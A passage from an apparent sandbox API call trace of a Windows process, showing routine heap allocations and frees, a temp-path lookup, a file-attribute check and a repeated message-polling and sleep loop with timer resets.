(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0284.267] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0284.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0284.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0284.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0284.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0284.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0284.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0284.268] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0284.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0284.269] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0284.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0284.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0284.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0284.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0284.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0284.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0284.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0284.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0284.269] timeGetTime () returned 0x471e3 [0284.269] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.269] Sleep (dwMilliseconds=0xa) [0284.280] timeGetTime () returned 0x471f3 [0284.280] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.280] Sleep (dwMilliseconds=0xa) [0284.295] timeGetTime () returned 0x47203 [0284.295] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.295] Sleep (dwMilliseconds=0xa) [0284.311] timeGetTime () returned 0x47212 [0284.311] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0284.311] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0284.311] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0284.311] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0284.311] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0284.311] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.311] Sleep (dwMilliseconds=0xa) [0284.326] timeGetTime () returned 0x47222 [0284.326] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.326] Sleep (dwMilliseconds=0xa) [0284.341] timeGetTime () returned 0x47231 [0284.342] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.342] Sleep (dwMilliseconds=0xa) [0284.357] timeGetTime () returned 0x47241 [0284.357] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.357] Sleep (dwMilliseconds=0xa) [0284.382] timeGetTime () returned 0x47251 [0284.382] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.383] Sleep (dwMilliseconds=0xa) [0284.389] timeGetTime () returned 0x47260 [0284.389] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.389] Sleep (dwMilliseconds=0xa) [0284.404] timeGetTime () returned 0x47270 [0284.404] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.404] Sleep (dwMilliseconds=0xa) [0284.420] timeGetTime () returned 0x4727f [0284.420] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.420] Sleep (dwMilliseconds=0xa) [0284.435] timeGetTime () returned 0x4728f [0284.435] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.435] Sleep (dwMilliseconds=0xa) [0284.452] timeGetTime () returned 0x4729f [0284.452] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.452] Sleep (dwMilliseconds=0xa) [0284.467] timeGetTime () returned 0x472ae [0284.467] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.467] Sleep (dwMilliseconds=0xa) [0284.482] timeGetTime () returned 0x472be [0284.482] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.482] Sleep (dwMilliseconds=0xa) [0284.498] timeGetTime () returned 0x472cd [0284.498] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.498] Sleep (dwMilliseconds=0xa) [0284.513] timeGetTime () returned 0x472dd [0284.513] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.513] Sleep (dwMilliseconds=0xa) [0284.530] timeGetTime () returned 0x472ed [0284.531] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.531] Sleep (dwMilliseconds=0xa) [0284.544] timeGetTime () returned 0x472fc [0284.545] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.545] Sleep (dwMilliseconds=0xa) [0284.560] timeGetTime () returned 0x4730c [0284.560] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.560] Sleep (dwMilliseconds=0xa) [0284.576] timeGetTime () returned 0x4731b [0284.576] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.576] Sleep (dwMilliseconds=0xa) [0284.591] timeGetTime () returned 0x4732b [0284.591] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.591] Sleep (dwMilliseconds=0xa) [0284.607] timeGetTime () returned 0x4733b [0284.607] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.607] Sleep (dwMilliseconds=0xa) [0284.622] timeGetTime () returned 0x4734a [0284.623] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.623] Sleep (dwMilliseconds=0xa) [0284.638] timeGetTime () returned 0x4735a [0284.638] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.638] Sleep (dwMilliseconds=0xa) [0284.654] timeGetTime () returned 0x47369 [0284.654] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.654] Sleep (dwMilliseconds=0xa) [0284.669] timeGetTime () returned 0x47379 [0284.669] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.669] Sleep (dwMilliseconds=0xa) [0284.690] timeGetTime () returned 0x47389 [0284.690] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.690] Sleep (dwMilliseconds=0xa) [0284.700] timeGetTime () returned 0x47398 [0284.700] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.701] Sleep (dwMilliseconds=0xa) [0284.716] timeGetTime () returned 0x473a8 [0284.716] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.716] Sleep (dwMilliseconds=0xa) [0284.732] timeGetTime () returned 0x473b7 [0284.732] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.732] Sleep (dwMilliseconds=0xa) [0284.749] timeGetTime () returned 0x473c7 [0284.749] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.749] Sleep (dwMilliseconds=0xa) [0284.763] timeGetTime () returned 0x473d7 [0284.763] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.763] Sleep (dwMilliseconds=0xa) [0284.778] timeGetTime () returned 0x473e6 [0284.778] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.779] Sleep (dwMilliseconds=0xa) [0284.795] timeGetTime () returned 0x473f6 [0284.795] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.795] Sleep (dwMilliseconds=0xa) [0284.810] timeGetTime () returned 0x47405 [0284.810] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.811] Sleep (dwMilliseconds=0xa) [0284.826] timeGetTime () returned 0x47415 [0284.826] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.826] Sleep (dwMilliseconds=0xa) [0284.842] timeGetTime () returned 0x47425 [0284.842] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.842] Sleep (dwMilliseconds=0xa) [0284.878] timeGetTime () returned 0x47444 [0284.878] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.878] Sleep (dwMilliseconds=0xa) [0284.888] timeGetTime () returned 0x47453 [0284.888] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.888] Sleep (dwMilliseconds=0xa) [0284.910] timeGetTime () returned 0x47463 [0284.910] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.910] Sleep (dwMilliseconds=0xa) [0284.931] timeGetTime () returned 0x47473 [0284.931] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.931] Sleep (dwMilliseconds=0xa) [0284.934] timeGetTime () returned 0x47482 [0284.934] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.934] Sleep (dwMilliseconds=0xa) [0284.951] timeGetTime () returned 0x47492 [0284.951] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.951] Sleep (dwMilliseconds=0xa) [0284.972] timeGetTime () returned 0x474a1 [0284.972] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.972] Sleep (dwMilliseconds=0xa) [0284.995] timeGetTime () returned 0x474b1 [0284.995] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.995] Sleep (dwMilliseconds=0xa) [0284.997] timeGetTime () returned 0x474c1 [0284.997] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0284.997] Sleep (dwMilliseconds=0xa) [0285.013] timeGetTime () returned 0x474d0 [0285.013] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.013] Sleep (dwMilliseconds=0xa) [0285.028] timeGetTime () returned 0x474e0 [0285.028] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.028] Sleep (dwMilliseconds=0xa) [0285.044] timeGetTime () returned 0x474ef [0285.044] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.044] Sleep (dwMilliseconds=0xa) [0285.060] timeGetTime () returned 0x474ff [0285.060] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.060] Sleep (dwMilliseconds=0xa) [0285.075] timeGetTime () returned 0x4750f [0285.075] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0285.075] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0285.075] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0285.075] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0285.076] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0285.076] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.076] Sleep (dwMilliseconds=0xa) [0285.090] timeGetTime () returned 0x4751e [0285.091] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.091] Sleep (dwMilliseconds=0xa) [0285.106] timeGetTime () returned 0x4752e [0285.106] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.106] Sleep (dwMilliseconds=0xa) [0285.125] timeGetTime () returned 0x4753d [0285.125] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.125] Sleep (dwMilliseconds=0xa) [0285.137] timeGetTime () returned 0x4754d [0285.137] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.137] Sleep (dwMilliseconds=0xa) [0285.153] timeGetTime () returned 0x4755d [0285.153] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.153] Sleep (dwMilliseconds=0xa) [0285.169] timeGetTime () returned 0x4756c [0285.169] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.169] Sleep (dwMilliseconds=0xa) [0285.184] timeGetTime () returned 0x4757c [0285.184] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.184] Sleep (dwMilliseconds=0xa) [0285.200] timeGetTime () returned 0x4758b [0285.200] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.200] Sleep (dwMilliseconds=0xa) [0285.228] timeGetTime () returned 0x4759b [0285.228] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.228] Sleep (dwMilliseconds=0xa) [0285.232] timeGetTime () returned 0x475ab [0285.232] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.232] Sleep (dwMilliseconds=0xa) [0285.250] timeGetTime () returned 0x475ba [0285.250] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.250] Sleep (dwMilliseconds=0xa) [0285.262] timeGetTime () returned 0x475ca [0285.262] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0285.262] Sleep (dwMilliseconds=0xa) [0285.284] timeGetTime () returned 0x475d9 [0285.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0285.285] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0285.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0285.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0285.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0285.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0285.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 